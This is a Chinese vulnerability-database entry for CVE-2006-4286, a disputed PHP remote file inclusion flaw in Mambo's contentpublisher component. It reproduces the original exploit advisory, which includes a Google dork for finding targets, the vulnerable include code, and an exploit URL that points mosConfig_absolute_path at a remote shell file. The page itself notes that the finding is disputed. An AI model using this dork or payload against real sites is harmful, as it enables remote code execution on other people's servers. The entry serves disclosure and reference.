Mambo软件的contentpublisher组件 'contentpublisher.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193756 漏洞类型 未知
发布时间 2006-08-22 更新时间 2006-12-11
CVE编号 CVE-2006-4286 CNNVD-ID CNNVD-200608-358
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006080140
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-358
|漏洞详情
**有争议**Mambo软件的contentpublisher组件(com_contentpublisher)中contentpublisher.php脚本存在PHP远程文件包含漏洞,远程攻击者可借助mosConfig_absolute_path参数中的URL执行任意PHP代码。注:第三方对此问题存在争议,称大多数近期版本中的contentpublisher.php脚本不支持直接请求。最初的研究人员提供的信息常常有误。
|漏洞EXP
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!

------------------------------------------------------------------------
--------

Title : contentpublisher Mambo Component Remote File Include Vulnerabilities

------------------------------------------------------------------------
--------

#Author: Crackers_Child

#cont@ct: crackers_child (at) sibersavascilar (dot) com [email concealed]

------------------------------------------------------------------------
--------

Google Dorks  : inurl:"/com_contentpublisher/"

------------------------- -------------------------------------------------------

Application :  contentpublisher/  Component of Mambo

------------------------------------------------------------------------
--------

Bug ?n contentpublisher.php

global $my, $mosConfig_live_site, $mosConfig_lang;

if (file_exists($mosConfig_absolute_path.'/components/com_contentpublisher/
languages/'.$mosConfig_lang.'.php')) {

include($mosConfig_absolute_path.'/components/com_contentpublisher/langu
ages/'.$mosConfig_lang.'.php');

} else {

include($mosConfig_absolute_path.'/components/com_contentpublisher/langu
ages/english.php');

}

------------------------------------------------------------------------
--------

Exploit:

http://[target]/[mambo_path]/components/contentpublisher/contentpublishe
r.php?mosConfig_absolute_path=Shell.txt?

------------------------------------------------------------------------
--------

greets:

All My Friends And SiberSavascilar.Com Members !

------------------------------------------------------------------------
--------

--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
|参考资料

来源:BUGTRAQ
名称:20060817contentpublisherMamboComponentRemoteFileIncludeVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/443626/100/0/threaded
来源:BUGTRAQ
名称:20060823Re:contentpublisherMamboComponentRemoteFileIncludeVulnerabilities
链接:http://www.securityfocus.com/archive/1/444244/100/0/threaded
来源:OSVDB
名称:28093
链接:http://www.osvdb.org/28093
来源:SREASON
名称:1431
链接:http://securityreason.com/securityalert/1431